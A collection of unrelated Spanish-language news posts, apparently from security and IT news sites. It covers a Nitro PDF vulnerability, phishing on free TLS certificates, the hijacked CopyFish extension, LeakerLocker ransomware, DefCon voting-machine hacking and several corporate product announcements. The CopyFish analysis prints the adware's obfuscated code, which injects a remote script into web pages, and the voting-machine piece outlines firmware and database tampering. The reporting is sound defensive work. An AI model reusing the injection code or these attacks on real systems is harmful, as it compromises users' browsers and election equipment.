Vulnerabilidad grave en Nitro PDF Pro

Se ha reportado una vulnerabilidad en Nitro PDF Pro, una herramienta empleada para el tratamiento de archivos PDF. La vulnerabilidad es considerada de gravedad alta y podría permitir a un atacante remoto ejecutar código malicioso.

Como ya hemos comentado anteriormente, Nitro Pro es un software de edición y conversión de documentos PDF. Cuenta con soporte para dispositivos OCR y una cantidad enorme de opciones de configuración y de seguridad. Permite editar cualquier tipo de documento, incluidas imágenes, párrafos y páginas.

El problema reportado sería causado por diferentes vulnerabilidades, una de ellas, la función ‘Doc.saveAs’ podría ser usada para sobreescribir ficheros dentro del sistema, y la otra podría ser usada para saltar restricciones de seguridad en ‘App.launchURL’ al introducir determinados caracteres dentro de la ruta de direcciones.

El problema, con CVE-2017-7442, podría permitir a un atacante remoto valerse de las vulnerabilidades explicadas anteriormente para ejecutar código arbitrario dentro del sistema a través de ficheros especialmente manipulados, visitar páginas web maliciosas y dependiendo de la vulnerabilidad, introduciendo caracteres especiales.

Este problema afecta a Nitro PDF Reader & Nitro Reader Pro.

Se recomienda actualizar a versiones superiores.

https://www.gonitro.com/product/downloads#securityUpdates

Más información:

Nitro PDF
http://gonitro.com/

Prueba de concepto:

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb

Certificados de dominio gratuitos: tu conexión con el phishing es segura

En el último post de su blog, Zscaler, una empresa de servicios de seguridad en la nube, ofrece algunas estadísticas interesantes sobre el uso de conexiones cifradas en esquemas de fraude y malware. No profundizaremos mucho en los datos, que vienen a confirmar con cifras concretas una situación que aquellos que trabajamos con phishing y malware conocemos: el constante incremento de amenazas que hacen uso de conexiones cifradas.

 

Aunque el artículo se centra en el malware, hay un dato que a priori puede pasar desapercibido aun siendo bastante abultado: según sus mediciones, los ataques de phishing que hacen uso de SSL/TLS han aumentado desde el pasado año. En un 400%. 12.000 peticiones al día en su plataforma.



Y esto, ¿por qué?

 

Este aumento no es casual. Por definición, el phishing necesita simular el sitio que suplanta, y el uso de una conexión cifrada o segura era un fleco que quedaba para satisfacer esta necesidad, más aún con la popularización del SSL/TLS. De hecho, el famoso “candadito verde” ha sido señalado durante años como indicador para diferenciar sitios legítimos y fraudulentos. El problema es que su significado no es el que se le atribuye.


Hace 9 años ya hablábamos de esto en “Mitos y leyendas: Compruebe el candadito del navegador para estar seguro“. Entonces ya comentamos que los certificados de validación de dominio, aparte de la función de cifrado, simplemente aseguran que el dominio pertenece a su propietario. Esta condición no es falsa para dominios fraudulentos; sigue siendo cierto que el phisher es el propietario, y hace factible el tener un sitio “seguro” aun siendo un phishing.

Por ello se introdujeron soluciones como los certificados EV (Extended Validation) que requieren no solo pruebas de propiedad del dominio, sino además de que el propietario es la entidad que dice ser. Son aquellos que aparecen con el nombre de la empresa en color verde en el navegador.

¿Cómo ha crecido tanto?

Varios factores han propiciado el aumento de conexiones cifradas en el phishing de un tiempo a esta parte. Por un lado, iniciativas como Let’s Encrypt, que permiten la obtención de un certificado de validación de dominio de manera gratuita solo demostrando control sobre el dominio. Y esto ya le ha valido alguna que otra queja. Si hace 9 años había certificados similares por 20 euros, hoy no tienen coste y el proceso de instalación es totalmente automatizado.


La posición de Let’s Encrypt al respecto es clara y no ha cambiado desde hace 2 años: Los emisores de certificados no son (y no pueden ser) vigilantes de contenido:

First, CAs are not well positioned to operate anti­-phishing and anti-malware operations – or to police content more generally. They simply do not have sufficient ongoing visibility into sites’ content. The best CAs can do is check with organizations that have much greater content awareness, such as Microsoft and Google. Josh Aas, Director de Let’s Encrypt: https://letsencrypt.org/2015/10/29/phishing-and-malware.html



A este respecto, Let’s Encrypt sí comprueba los dominios que piden certificados con Google Safe Browsing, de forma que el certificado se deniega si están marcados como malware o phishing. Sin embargo, la utilidad de esta medida no está del todo clara, ya que el certificado se pide poco después de pedir el dominio, en un momento en el que ni siquiera tiene contenido y, por tanto, no ha podido ser detectado. Como ellos mismos dicen, “el contenido cambia de manera más rápida que lo que una CA puede comprobar o certificar”.


Pero el problema puede agravarse. Plataformas de creación de sitios gratuitos, algunas auténticos nidos de fraude, ofrecen también desde hace tiempo añadir SSL de manera automática e incluso sin coste. Esta característica se ofrece a través tanto de Let’s Encrypt como de la plataforma cPanel, que a finales de año comenzó a ofrecer este servicio junto a Comodo. En estos casos, el phisher no tiene más que marcar una casilla para obtener un certificado y “candadito” para su sitio fraudulento.


Y todo esto unido a los sitios comprometidos que ya cuentan con certificado y del que se aprovechan los atacantes. Aunque en este caso el phishing es más evidente al ser el dominio distinto.


Sea cual sea el caso, solo hay que darse una vuelta por Phishtank para encontrar algunos ejemplos.


¿Por qué ahora y no antes?

La popularización del cifrado en la web y el empuje de los navegadores han tenido mucho que ver. Toda web con un formulario y sin HTTPS es marcada con un rotundo “No es seguro” en algunos navegadores, lo que puede disparar las alarmas en el usuario. Lo que antes era un añadido que daba más veracidad al fraude es ahora una necesidad. Por otro lado, hasta la aparición de los certificados gratuitos no salía realmente a cuenta a los atacantes comprarlo y configurarlo, menos aún cuando los tiempos de vida de un phishing son cada vez más cortos.


¿Me fio del “candado” entonces?

Por supuesto, sin perder de vista lo que significa: que la conexión está cifrada y que el dominio pertenece al propietario, aunque este puede ser un phisher. Solo con el candado no podemos estar seguros de que el sitio web pertenece a la organización a la que realmente queremos acceder, pero sigue siendo una métrica más (junto con el nombre del dominio, el enlace que nos ha llevado allí, etc.) para discernir si el sitio es fraudulento o no.


Más información:

SSL/TLS-based malware attacks

https://www.zscaler.com/blogs/research/ssltls-based-malware-attacks

World’s Largest CA Comodo and Web Hosting Platform Leader cPanel
Join Forces to Enable Automated SSL Encryption for the Web
https://www.comodo.com/news/press_releases/2016/12/worlds-largest-CA-comodo-and-web-hosting-platform-leader-cPanel.html

Mitos y leyendas: “Compruebe el candadito del navegador para estar seguro” I (Phishing)
http://unaaldia.hispasec.com/2008/06/mitos-y-leyendas-el-candadito-del_03.html

CopyFish: Extensión para Google Chrome secuestrada e infectada con adware

CopyFish es un software de OCR para Google Chrome que permite extraer textos de imágenes, PDFs y vídeos. La extensión cuenta a día de hoy con 37.740 usuarios, que recibieron el pasado 29 de julio una nueva actualización que venía con una desagradable sorpresa.

Y es que la extensión había sido secuestrada. Mediante un ataque de phishing dirigido a uno de los desarrolladores, los atacantes lograron acceder a su cuenta de “Google extensions” y robar la aplicación, transfiriéndola a otra cuenta bajo su control.

El phishing mostraba un login falso a Google extensions y estaba alojado en https://chromedev.freshdesk.com

Phishing de Google Extension

Tras modificar la aplicación, publicaron la nueva versión del plugin (V2.8.5) en el repositorio de Google.

Los usuarios empezaron a reportar anuncios y spam en las webs que visitaban, lo que levantó las sospechas de los desarrolladores, que en ese punto ya habían perdido el control sobre su aplicación.

Gracias a un usuario de la comunidad de HackerNews se pudo contactar con uno de los administradores de UNPKG, un CDN para paquetes ‘npm’ que utilizaba la extensión maliciosa. Gracias a esto se pudo desactivar rápidamente el malware:

El pasado 1 de agosto el soporte técnico de Google devolvió la aplicación a sus legítimos desarrolladores, que actualizaron rápidamente el plugin con una versión limpia:

UPDATE August 1, 2017: This is the new, updated and SAFE version of Copyfish. For more details on what happened please see https://a9t9.com/blog/chrome-extension-adware/

Además se desactivó la versión maliciosa para los usuarios que aún la tenían instalada.

Los cambios que introducía el adware cargaban código Javascript alojado en UNPKG y añadían algún código para debuggear la aplicación:

En el archivo manifest.js:

“matches”: [ “<all_urls>” ] -> se sustituyó por “matches”: [ “\u003Call_urls>” ]

En background.js:

console.log(“Start”);

chrome.runtime.onInstalled.addListener(function(details) {
console.log(“onInstalled”);
if(details.reason == “install”) {
console.log(“This is a first install!”);
} else if(details.reason == “update”){
var thisVersion = chrome.runtime.getManifest().version;
console.log(“Updated from ” + details.previousVersion + ” to ” + thisVersion);
chrome.storage.local.set({‘installed’: Date.now()});
}
});

En cs.js, donde se carga el código malicioso:

chrome.storage.local.get(‘installed’, function (item) {
if (item && item.installed) {
installed = item.installed;
console.log(‘Installed:’ + installed);

if (installed) {
console.log(‘Installed ms:’ + (Date.now() – installed));

if ((Date.now() – installed) > 10 * 60 * 1000) {
console.log(‘Now’);

var date = new Date();
var hour = date.getUTCHours();

console.log(hour);

var thisVersion = chrome.runtime.getManifest().version;

console.log(thisVersion);
thisVersion = thisVersion.replace(‘.’, ‘-‘);
thisVersion = thisVersion.replace(‘.’, ‘-‘);
console.log(thisVersion);

var hash = “copyfish-npm-” + thisVersion;

console.log(hash);

var config_fragment = ‘<sc’ + ‘ript sr’ + ‘c=”ht’+ ‘tps://un’ + ‘p’ + ‘kg.com/’ + hash + ‘/’ + hour + ‘.js”></sc ‘ + ‘ript>’;

var range = document.createRange();
range.setStart(document.body, 0);
document.body.appendChild(range.createContextualFragment(config_fragment));
}
}
}
});

A día de hoy la versión infectada ya está desactivada y se han tomado las medidas de seguridad oportunas. Decir que sólo afecta a Google Chrome, la versión para Firefox no ha sido comprometida.

Más información:

Extensión oficial en Google

Presentan próxima generación de Salesforce Service Cloud

De acuerdo con lo informado, las compañías podrán configurar e instalar Service Cloud en un solo día. Asimismo, la nueva Lightning Service Console agrega nuevas capacidades para impulsar la productividad de los representantes.

Salesforce afirmó que el nuevo Service Cloud, basado en la estructura de componentes Salesforce Lightning, “atiende las necesidades del cliente de hoy, quien espera experiencias de servicio rápidas, personalizadas y disponibles a través de sus canales de preferencia”.

De esta manera, Service Cloud promete a todas las compañías, si importar su tamaño, una plataforma de servicio al cliente “flexible y moderna que es fácil de instalar, aprender y personalizar para satisfacer las necesidades presentes y futuras”.

Entre las innovaciones en Service Cloud se puede destacar que el manejo de casos ahora se encuentra preintegrado, al tiempo que una nueva experiencia de instalación simplifica los pasos necesarios para implementar flujos de servicio esenciales, con clics, sin la necesidad de programación. Los administradores del sistema pueden agregar una comunidad de clientes y una base de conocimientos, así como conectarse al correo electrónico y a las fuentes de Facebook y Twitter, en ocasiones en tan sólo cinco pasos.

Asimismo, AppExchange and Lightning App Builder for Service ofrece a los equipos de servicio una manera sencilla de personalizar y expandir Service Cloud. ampliando la funcionalidad con sólo arrastrar y soltar en Service Cloud alguno de los nuevos componentes de servicio Lightning, tales como la barra lateral de conocimientos o el registro relevante.

Por otra parte, las compañías pueden ampliar aún más la funcionalidad de Service Cloud con las más de 75 aplicaciones de servicio de los socios listas para Lightning disponibles en AppExchange.

En lo que respecta a la experiencia de escritorio unificada para los representantes de servicio al cliente, a través de Lightning Service Console, se incluyen varias capacidades nuevas, como Case Kanban, que proporciona un panel de control visual de los casos en espera; Community Agent 360, que muestra la historia del cliente en la comunidad; y Federated Search, que lo ayuda a encontrar los registros rápidamente en las fuentes de datos de Salesforce y en las externas como ConfluenceYouTubeDropbox and Box. Finalmente, Macro Builder les permite crear macros reutilizables al instante para casos de servicio específicos que pueden consultar rápidamente si el problema vuelve a surgir.

Finlamente, la aplicación Service Cloud Mobile para iOS y Android nativa, permitirá a los representantes brindar un servicio personalizado al cliente desde cualquier lugar.

Precio y disponibilidad
Service Out-of-the-Box, Lightning App Builder for Service, Lightning Service Console, Federated Search y Case Kanban ya están disponibles sin costo con cualquier edición de Service CloudService Cloud.

Community Agent 360 ya está disponible en versión piloto sin costo con una licencia de Customer Community Cloud.

Se espera que Macro Builder esté disponible en el segundo semestre del 2017 sin costo con cualquier edición de Service Cloud.

Se espera que la aplicación Service Cloud Mobile para iOS y Android esté disponible en versión piloto en el segundo semestre del 2017 sin costo con cualquier edición de Service Cloud.

ALE integra audio de PGi para su plataforma de UC&C

 

De esta manera, los usuarios pueden configurar el servicio de audio a través de la interfaz Rainbow, eliminando la necesidad de soporte de TI. Además, las opciones de precios, incluidos paquetes por minuto y por usuario, conectan hasta 250 participantes con más de 160 puntos de acceso locales en más de 60 países.

ALE, que opera bajo la marca Alcatel-Lucent Enterprise, anunció que está trabajando con PGi, el mayor proveedor dedicado de soluciones de colaboración, para ofrecer audio conferencia integrada de alta definición para su plataforma de comunicaciones colaborativas, Rainbow.

En el entorno empresarial actual, las llamadas en conferencia representan más de la mitad y hasta tres cuartas partes de las de audio, tanto de entrada como de salida, de las pymes y las grandes empresas. Por otra parte, un estudio reciente realizado por Wainhouse Research mostró que casi el 70% de las organizaciones utilizarán más conferencias este año.

De esta manera, más empresas están adoptando herramientas de comunicación colaborativa en nube como Rainbow. Con la integración de audio de GlobalMeet, esta plataforma ofrece más números, más países y acceso gratuito, para optimizar su inversión. “Juntos, Rainbow, impulsado por el motor de audio de alta calidad de PGi proporciona una comunicación de voz segura y clara a cada reunión con precios flexibles”, destacan desde ALE.

Los beneficios de la solución son conferencias de audio de alta calidad que utilizan cualquier dispositivo, permitiendo que los contactos internos y externos participen con una interfaz fácil de usar.

“Estamos muy entusiasmados de asociarnos con PGi. Entre las dos empresas tenemos tecnología de punta y plataformas para ofrecer a las empresas tecnologías superiores de servicios en la nube. Ambas compañías están totalmente dedicadas a brindar servicios basados en la nube de excelente calidad que ofrecen el máximo beneficio para los clientes. Confiamos en que la integración de Rainbow, nuestra principal oferta de Team Messaging basada en la nube, con la tecnología de conferencia de audio líder de PGi, aumentará la satisfacción del usuario eliminando las frustraciones creadas por la mala calidad de audio conferencia”, dijo Matthieu Destot, VP ejecutivo Global de Ventas y Marketing de ALE.

Intel lanza módulo USB de informática neuronal

El Movidius Neural Compute Stick es el primer equipo de inferencia de aprendizaje profundo basado en USB y acelerador autónomo de inteligencia artificial.

De acuerdo con lo informado por la compañía, ofrece capacidades especiales de procesamiento de redes neuronales profundas para una amplia variedad de dispositivos receptores externos.

Diseñado para desarrolladores de productos, investigadores y fabricantes, busca reducir las barreras al desarrollo, el ajuste y la implementación de aplicaciones de AI brindando un procesamiento especial y de alto rendimiento de redes neuronales profundas en un módulo de tamaño compacto.

“Debido a que cada vez más desarrolladores adoptan avanzados enfoques de aprendizaje automatizado para crear aplicaciones y soluciones innovadoras, Intel se compromete a brindar el conjunto de herramientas y recursos de desarrollo más completo con el fin de garantizar que los desarrolladores estén bien equipados para una economía digital basada en inteligencia artificial”, informó la compañía.

Ya sea para el entrenamiento de redes neuronales artificiales en la nube Intel Nervana, para optimizar las cargas de trabajo emergentes, tales como inteligencia artificial, realidad virtual o aumentada y conducción autónoma con los procesadores escalables Intel Xeon, o para ampliar las fronteras de la inteligencia artificial con la unidad de procesamiento de visión (VPU), Movidius, ofrece una amplia variedad de herramientas de AI

“La VPU Myriad 2, instalada en el módulo Movidius Neural Compute Stick, ofrece un rendimiento potente y eficiente (más de 100 gigaflops de rendimiento dentro de un envolvente de potencia de 1W) para ejecutar redes neuronales profundas en tiempo real directamente desde el dispositivo”, explicó Remi El-Ouazzane, vicepresidente y director general de Movidius, una empresa de Intel. “Esto permite implementar sin conexión una amplia variedad de aplicaciones de inteligencia artificial”.

El desarrollo de inteligencia automatizada se compone fundamentalmente de dos etapas: entrenamiento de un algoritmo en grandes conjuntos de datos a través de técnicas modernas de aprendizaje automatizado; y ejecución del algoritmo en una aplicación final que necesite interpretar datos reales. A esta segunda etapa se la conoce como “inferencia”.

La inferencia externa o nativa (dentro del dispositivo) brinda beneficios en cuanto a latencia, consumo de energía y privacidad.

En lo que respecta a compilación, convierte automáticamente una red neuronal convolucional (CNN) entrenada y basada en Caffe en una red neuronal integrada y optimizada para su ejecución en la unidad incorporada Movidius Myriad 2 VPU.

Asimismo, Intel asegura que las métricas de rendimiento por capa, tanto para las redes neuronales estándares como para aquellas personalizadas, “permiten un ajusteefectivo para lograr un verdadero rendimiento óptimo con muy bajo consumo. Con las secuencias de comandos de validación, los desarrolladores pueden comparar la precisión del modelo optimizado del dispositivo con el modelo original basado en PC.”

Por último, el módulo Movidius Neural Compute Stick puede actuar como un acelerador discreto de redes neuronales, agregando capacidades especiales de inferencia de aprendizaje profundo a plataformas informáticas ya existentes para mejorar el rendimiento y la eficiencia energética.

El módulo de informática neuronal Movidius Neural Compute Stick está disponible a través de distribuidores selectos a US$ 79 (precio de venta sugerido).

Más información
Movidius developer website

Oracle expande su oferta de Cloud at Customer con servicios PaaS y SaaS

ITware Latam entrevistó a Nirav Mehta, Enterprise Account Manager, Private Cloud Infrastructure de la compañía, para conocer en detalle de qué manera la compañía busca apoyar a sus clientes en su camino a la Nube con esta nueva propuesta. “En América Latina, esta oferta ayudará a extender la huella de Oracle Cloud a países que no tienen un Data Center Oracle Cloud local”, enfatizó.

Nirav Mehta, Enterprise Account Manager, Private Cloud Infrastructure de Oracle.

Oracle Cloud at Customer es una plataforma de infraestructura en la Nube que se basa en hardware convergente de la compañía, almacenamiento y redes definidas por software, además de una abstracción de IaaS del más alto nivel. La compañía administra y mantiene la esta infraestructura en las instalaciones de los clientes para que puedan concentrarse en utilizar los servicios IaaSPaaS y SaaS.

De esta manera, Oracle responde a las necesidades de muchas organizaciones que si bien buscan trasladar sus cargas de trabajo empresariales a la Nube pública, se han visto limitadas por requisitos comerciales, legislativos y normativos.

Thomas Kurian
President, Product Development, de Oracle.

Los servicios de Oracle ofrecen a las organizaciones la posibilidad de elegir dónde residirán sus datos y aplicaciones, así como una ruta natural para trasladar fácilmente aplicaciones empresariales críticas a la Nube pública con el tiempo. Con esta expansión significativa en la variedad de servicios disponibles, la compañía busca facilitar a las organizaciones trasladar sus cargas de trabajo a la Nube al tiempo que las conservan en sus propias instalaciones.

Como gran novedad, el portafolio ahora abarca todas las principales categorías de PaaS y, por primera vez, incluye también sus servicios SaaS, incluyendo ERPHuman Capital Management (HCM)CRM y Supply Chain Management (SCM). “Oracle continuará construyendo los servicios ofrecidos basados en la demanda y necesidad de los clientes”, prometió el entrevistado.

Mehta hizo hincapié en la ampliación realizada por la compañía sobre Oracle Cloud en Customer desde su introducción hace un año: “Inicialmente, ofrecimos un puñado de servicios PaaS, incluyendo Oracle Database Cloud y Oracle Java Cloud, y en los últimos 12 meses hemos aumentado las capacidades y ampliado la gama de servicios para que los clientes puedan mover más cargas de trabajo en forma transparente”, detalló. “Estamos añadiendo soporte para docenas de nuevos servicios en todas las principales categorías de Oracle PaaS: desarrollo de aplicaciones, gestión de datos, integración, Big DataAnalytics y seguridad”, destacó.

Estos servicios hacen uso de las mejoras específicas que se han realizado a la plataforma subyacente de Oracle Cloud at Customer, como servidores con CPU más rápidos y almacenamiento flash basado en NVMe, así como almacenamiento de bloque solo en flash.

Asimismo, el ejecutivo explicó que la nueva Oracle Big Data Cloud Machine es un sistema optimizado que entrega una plataforma Hadoop y Spark de producción con la potencia de nodos dedicados y la flexibilidad y simplicidad de una oferta en la nube: “Las organizaciones pueden ahora acceder a una gama completa de herramientas Hadoop, Spark y Analytics en un modelo de suscripción simple en sus propios Data Centers”, sostuvo.

El impacto en Latinoamérica

Al ser consultado sobre cómo afectarán estos servicios a los clientes de Oracle en Latinoamérica, Mehta sostuvo que esta oferta ayudará a extender la huella de Oracle Cloud a países que no tienen un centro de datos local de la compañía. “En lugar de tener que acceder a la nube de Oracle a través de Internet con latencia potencialmente alta, las organizaciones pueden tener servicios de nube públicos justo al lado de sus aplicaciones locales existentes y comunicarse con estos servicios en la nube con latencia cercana a cero”, destacó.

En ese sentido, aseguró que desde Oracle están viendo una fuerte adopción en Latinoamérica en los sectores de saludfinanciero y público, donde la residencia y la privacidad de datos desempeña un papel importante en la selección de una solución tecnológica.

En lo que respecta al rol de los channel partners en esta nueva oferta de Oracle, el ejecutivo aseguró que les ofrece “una herramienta más para satisfacer las necesidades de sus clientes”. A modo de ejemplo, mencionó el caso de Mythics, que trabajó recientemente con la Universidad Estatal de Nueva York, el sistema universitario más amplio de Estados Unidos, para implementar Oracle Cloud en el cliente.

Finalmente, aseguró: “En Latinoamérica, hemos tenido varios proyectos dirigidos por socios de canal, que revende el servicio y luego ofrece servicios de valor agregado para mejorar la experiencia del cliente o integrar los nuevos servicios en la nube con las aplicaciones existentes”.

Más información

Oracle Cloud at Customer

LeakerLocker, el malware para Android que amenaza con chivarse a tus contactos

Nacido a principios de 2016 y repuntando en los últimos días,LeakerLocker amenaza con mandar tu información personal (fotos, números, mensajes…) a todos tus contactos si no pagas un rescate. En su última campaña se ha hecho pasar por aplicaciones legítimas en Google Play.

La pantalla del resc

Bajo los nombres Wallpapers Blur HDBooster & Cleaner Pro, y Calls Recorder, se encontraba en Google Playhasta hace poco este peculiar malware. Entre otros, amenaza con enviar a todos tus contactos tus fotos, números de teléfono, mensajes de Facebook, correos electrónicos… Si no pagas una modesta cantidad. O al menos eso es lo que dice, porque no se ha encontrado esta supuesta funcionalidad en el código de la aplicación. Aunque tampoco se puede descartar, ya que este troyano contempla la ejecución de código arbitrario descargado de los servidores del atacante.

La línea temporal de este malware no es especialmente compleja. Primero, infecta al usuario haciéndose pasar por una aplicación legítima en Google Play. Segundo, recopila la información personal e información sobre el uso del dispositivo. Finalmente, y tras varias comprobaciones que comentamos a continuación, descarga código adicional de servidores del atacante y lo ejecuta. En este código se pueden observar funciones relacionadas con la apertura, gestión e intercepción de datos de WebViews (vistas web genéricas), funcionalidades usadas entre otras cosas para suplantar la identidad de aplicaciones legítimas y capturar sus credenciales. Pero aparte de bloquear el móvil con la imagen que se muestra arriba (y no permitir su uso hasta el pago) no realiza más actividades maliciosas.

Una de las funcionalidades más interesantes de este malware es la lista de comprobaciones que realiza para permitir su propia ejecución. A priori, uno puede pensar que, una vez infectados, lo interesante es que se ejecute siempre. Pero pensándolo bien sería interesante que no se ejecutase en condiciones de laboratorio (cuando se analiza el malware) para evitar su detección intencionada por expertos. Entre otras, realiza las siguientes comprobaciones:

  • Hay más de 10 contactos y más de 10 fotos
  • Constan 3 o más registros de llamadas
  • La aplicación se ha descargado a través de Google Play
 
Adicionalmente, la parte principal del malware no se ejecuta hasta pasados 15 minutos desde la infección, lo que es una contramedida contra técnicas de análisis automático.
Una de las aplicaciones por las que se hace pasar este malware
Para evitar infectarse con este tipo de malware, ya en Google Play, aquí van unos cuantos consejos aplicables por el usuario de a pie:

 

  • No instalar aplicaciones que usen la imagen o suplanten la identidad de aplicaciones oficiales (Una aplicación con el icono de WhatsApp)
  • Comprobar que los permisos que pide la aplicación para instalarse tienen sentido (una aplicación de una linterna que pide permiso para usar el micrófono, sospechoso…)
  • Comprobar los comentarios negativos, a veces avisar que es malware o incluso que la aplicación no funciona (hay mucho malware muy mal programado…)
  • No instalar aplicaciones que prometen funcionalidad maligna (hacer trampas en un juego o “hackear” WhatsApp, si es que te mereces la infección…)
Más información sobre este malware y su comportamiento se puede encontrar buscando en Koodous las muestras con los siguientes hashes:

 

cb0a777e79bcef4990159e1b6577649e1fca632bfca82cb619eea0e4d7257e7b
486f80edfb1dea13cde87827b14491e93c189c26830b5350e31b07c787b29387
299b3a90f96b3fc1a4e3eb29be44cb325bd6750228a9342773ce973849507d12
c9330f3f70e143418dbdf172f6c2473564707c5a34a5693951d2c5fc73838459
d82330e1d84c2f866a0ff21093cb9669aaef2b07bf430541ab6182f98f6fdf82
48e44bf56ce9c91d38d39978fd05b0cb0d31f4bdfe90376915f2d0ce1de59658
14ccc15b40213a0680fc8c3a12fca4830f7930eeda95c40d1ae6098f9ac05146
4701a359647442d9b2d589cbba9ac7cf56949539410dbb4194d9980ec0d6b5d4

Poniendo a prueba la seguridad de las máquinas de votación en la DefCon

El pasado fin de semana se celebró la famosa conferencia de seguridad DefCon en su 25ª edición. En esta ocasión,  el gobierno norteamericano cedió algunas máquinas de votación ya retiradas para que los investigadores disfrutaran y a la vez encontraran agujeros de seguridad para mejorar las nuevas remesas de máquinas.

Una de las máquinas cedidas fue la “ExpressPoll 5000”, que utilizaba un antiguo slot PCMCIA para transferir archivos, además de almacenar distintas bases de datos. Para empezar, hicieron un pequeño chequeo al sistema para sacar información general, como:

  • Sistema operativo Windows CE 5.0
  • El software estaba desarrollado en una aplicación usando .NET.
  • El software utilizaba WinForms en la interfaz de usuario.
  • El “bootloader” era propietario.
  • La arquitectura del procesador era ARM.
  • Contenía un fichero de base de datos en una tarjeta de memoria.

Tras probar múltiples exploits típicos para esta versión de Windows sin éxito, los investigadores se centraron en otro vector de ataque: la tarjeta de memoria.

Al arrancar el sistema con la tarjeta de memoria insertada, el bootloader comprueba un archivo llamado NK.BIN. Si está presente, lo carga en memoria RAM sin ningún tipo de comprobación de autenticidad. En ese momento se puede cambiar el firmware de manera permanente.

En este caso el archivo NK.BIN se utiliza para actualizaciones de Windows CE 5.0 en dicha máquina, pero un atacante puede subir y ejecutar cualquier Kernel NT e incluso una imagen con Linux (aunque esta última posibilidad no fue probada).

Inyección del nuevo bootloader


De manera similar a la que se cambia el firmware, también es posible cambiar el bootloader del sistema utilizando el fichero “EBOOT.BIN”. Se carga sin comprobar ninguna firma de integridad, al igual que el NK.BIN. Por desgracia esta vez la inyección no funcionó y el dispositivo quedó inservible.

Sobreescribiendo el archivo de recursos de la aplicación .NET

Cuando el software de ExpressPoll se lanza desde el botón “Lanzar” carga desde la tarjeta de memoria el archivo llamado “ExPoll.resources”. La idea de este archivo es poder definir imágenes, cadenas, botones, layouts, etc. Está pensado para personalizar la aplicación, por ejemplo sustituyendo el logotipo de Diebold.

El punto de fallo en el sistema es que los botones (y potencialmente otros elementos de la interfaz) se pueden sobreescribir para hacer otras acciones diferentes, como ejecutar un archivo almacenado en la tarjeta de memoria o ejecutar un comando en Windows CE.

La vulnerabilidad ha sido confirmada creando un archivo de recursos aleatorio de .NET, nombrándolo ExPoll.resources y copiándolo a la tarjeta de memoria. Como era de esperar, el sistema mostró un error, lo que significa que la carga del archivo funcionó. Pero al cargar un archivo corrupto se copió a memoria y dejando el sistema inservible en el proceso.

Bases de datos SQLite3

Pero sin duda una de las vulnerabilidades que más llamaron la atención es la del archivo de base de datos llamado “PollData.db3” en la tarjeta de memoria. Esta base de datos contenía toda la información de las encuestas, votantes… Usando esta información nos encontramos con varios tipos de posible ataques:

  • Filtración de información: Un atacante puede fácilmente extraer la tarjeta de memoria y reemplazarla por una que esté vacía.
  • Falsificación de información: Un atacante podría crear su propia base de datos y, reemplazando la tarjeta, cambiar los votos por unos falsos.
Datos de la base de datos. Fuente: blog.horner.tj

Puertos USB abiertos

El dispositivo dispone de una serie de puertos USB donde un atacante puede introducir un dispositivo para lanzar un ataque. A partir de aquí, las posibilidades quedan abiertas a la imaginación del lector.

Servidor web por defecto en WinCE

Windows CE tiene por defecto un servidor web abierto en el puerto 80 que se podría considerar como un riesgo de seguridad. Por ahora no han conseguido ningún ataque usando este vector, pero la investigación sigue abierta.

Los investigadores probaron otra serie de ataques, como desbordamientos de memoria usando “Bash Bunny” a través de los puertos USB, o introduciendo una base de datos de SQLite mayor de 1GB, sin que llegara a funcionar.

Más información:
Hacking Voting Machines at DEF CON 25
https://blog.horner.tj/post/hacking-voting-machines-def-con-25